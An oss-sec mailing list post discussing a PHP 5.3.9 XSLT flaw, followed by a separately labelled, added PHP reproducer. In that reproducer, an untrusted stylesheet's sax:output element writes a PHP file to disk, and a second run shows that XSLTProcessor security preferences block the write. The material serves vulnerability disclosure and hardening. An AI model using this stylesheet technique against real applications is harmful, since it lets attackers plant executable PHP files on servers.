oss-sec mailing list archives
Re: CVE affected for PHP 5.3.9 ?
From: Kurt Seifried <kseifried () redhat com>
Date: Sat, 14 Jan 2012 19:44:07 -0700
On 01/14/2012 05:15 PM, Nicolas Grégoire wrote:
>> Right but the script has to have the line <sax:output href="0wn3d.php" method="text">
>
> Wrong. The PHP code only has to call transformToXML() after having loaded the malicious XSLT code via importStylesheet(). The XML data itself is irrelevant for this bug and the "sax:output" tag isn't in the PHP script but in the XSLT stylesheet provided by the attacker.
>
> # LOAD XML FILE
> $XML = new DOMDocument();
> $XML->loadXML( $sXml );
>
> # LOAD XSLT FILE
> $XSL = new DOMDocument();
> $XSL->loadXML( $sXsl ); // Content of $sXsl may be untrusted !
>
> # START XSLT
> $xslt = new XSLTProcessor();
> $xslt->importStylesheet( $XSL );
>
> # TRANSFORM & PRINT
> print $xslt->transformToXML( $XML ); // File creation !
>
> Nicolas
So the attacker can control the output file name/location via a malformed input from the attacker only? This would have been good to have in your original info (we could have avoided this back and forth). Can you provide a reproducer (vuln script and a malicious input) that shows this in action (e.g. creates a local php file)?

-- 
Kurt Seifried / Red Hat Security Response Team
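The reproducer Kurt asks for, built around the exact script shape Nicolas quoted: the XML data is harmless, the stylesheet is the attacker-controlled part, and the only thing that differs between the two runs is the XSLTProcessor security policy. This is an added example and not code from the original thread, from PHP or from libxslt. It assumes the "sax" prefix of the quoted stylesheet is bound to http://icl.com/saxon (the namespace libxslt's saxon:output extension element lives in), that the PHP build is 5.4 or later so that XSLTProcessor::setSecurityPrefs() exists (on 5.3.9 the equivalent knob is the xsl.security_prefs ini setting), and the output path, payload and XML document are all made up. The file is written under the system temp directory rather than the working directory so the demonstration cleans up after itself.

```php
<?php
// Added reproducer: not code from the original thread, PHP or libxslt.
// Assumptions: "sax" is bound to libxslt's Saxon namespace http://icl.com/saxon,
// PHP >= 5.4 (XSLTProcessor::setSecurityPrefs exists), illustrative path/payload.

$outFile = sys_get_temp_dir() . DIRECTORY_SEPARATOR . '0wn3d.php';

// Constructed sample data. The XML document plays no part in the bug.
$sXml = '<?xml version="1.0"?><doc><item>hello</item></doc>';

// Constructed attacker-controlled stylesheet. Everything inside <sax:output> is
// serialised to the file named in href (method="text" means no XML declaration).
$sXsl = <<<XSL
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:sax="http://icl.com/saxon">
  <xsl:template match="/">
    <sax:output href="{$outFile}" method="text">
      <xsl:text>&lt;?php echo "written by the stylesheet"; ?&gt;</xsl:text>
    </sax:output>
    <xsl:text>transform finished</xsl:text>
  </xsl:template>
</xsl:stylesheet>
XSL;

// The application code, in the shape quoted above: load data, load the
// (untrusted) stylesheet, transform. $prefs is the XSLTProcessor policy; the
// XSL_SECPREF_* bits name the operations that are FORBIDDEN, so
// XSL_SECPREF_NONE (0) allows everything and reproduces the unrestricted behaviour.
function transform(string $sXml, string $sXsl, int $prefs): string
{
    $XML = new DOMDocument();
    $XML->loadXML($sXml);

    $XSL = new DOMDocument();
    $XSL->loadXML($sXsl);            // content of $sXsl may be untrusted!

    $xslt = new XSLTProcessor();
    $xslt->setSecurityPrefs($prefs); // applied by PHP when the transform runs
    $xslt->importStylesheet($XSL);
    return (string) $xslt->transformToXML($XML);
}

// Run one policy and report whether the stylesheet managed to create the file.
function fileWritten(string $sXml, string $sXsl, int $prefs, string $outFile): bool
{
    @unlink($outFile);
    $result  = @transform($sXml, $sXsl, $prefs); // libxslt warns when it refuses a write
    $written = file_exists($outFile);
    printf("prefs=%2d transform output: %s\n", $prefs, trim($result));
    printf("          %s created: %s\n", $outFile, $written ? 'YES' : 'no');
    if ($written) {
        printf("          contents: %s\n", file_get_contents($outFile));
    }
    return $written;
}

// 1. Unrestricted processor: the file write the thread is about.
fileWritten($sXml, $sXsl, XSL_SECPREF_NONE, $outFile);

// 2. Hardened: forbid file writes, directory creation and network writes.
//    XSL_SECPREF_DEFAULT is exactly this combination (value 44).
$deny = XSL_SECPREF_WRITE_FILE | XSL_SECPREF_CREATE_DIRECTORY | XSL_SECPREF_WRITE_NETWORK;
fileWritten($sXml, $sXsl, $deny, $outFile);

@unlink($outFile);
```

Run it from the command line with the xsl extension loaded. The first run creates 0wn3d.php with the payload as its contents while transformToXML() still returns the normal result document, which is why the bug is invisible to an application that only looks at the transform output; the second run leaves no file behind. The application never names a file anywhere: the name, the location and the contents all come from the stylesheet, which is the point Nicolas makes above. Reading local files via document() is governed by the separate XSL_SECPREF_READ_FILE bit, so add it to $deny if the application has no reason to let stylesheets read the filesystem either.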
Current thread:
- CVE affected for PHP 5.3.9 ? Nicolas Grégoire (Jan 13)
- Re: CVE affected for PHP 5.3.9 ? Kurt Seifried (Jan 13)
- Re: CVE affected for PHP 5.3.9 ? Nicolas Grégoire (Jan 13)
- Re: CVE affected for PHP 5.3.9 ? Kurt Seifried (Jan 13)
- Re: CVE affected for PHP 5.3.9 ? Nicolas Grégoire (Jan 13)
- Re: CVE affected for PHP 5.3.9 ? Kurt Seifried (Jan 13)
- Re: CVE affected for PHP 5.3.9 ? Ignacio Espinosa (Jan 14)
- Re: CVE affected for PHP 5.3.9 ? Kurt Seifried (Jan 14)
- Re: CVE affected for PHP 5.3.9 ? Nicolas Grégoire (Jan 14)
- Re: CVE affected for PHP 5.3.9 ? Kurt Seifried (Jan 14)
- Re: CVE affected for PHP 5.3.9 ? Nicolas Grégoire (Jan 15)
- Re: CVE affected for PHP 5.3.9 ? Kurt Seifried (Jan 17)
- Re: CVE affected for PHP 5.3.9 ? Nicolas Grégoire (Jan 13)
- Re: CVE affected for PHP 5.3.9 ? Kurt Seifried (Jan 13)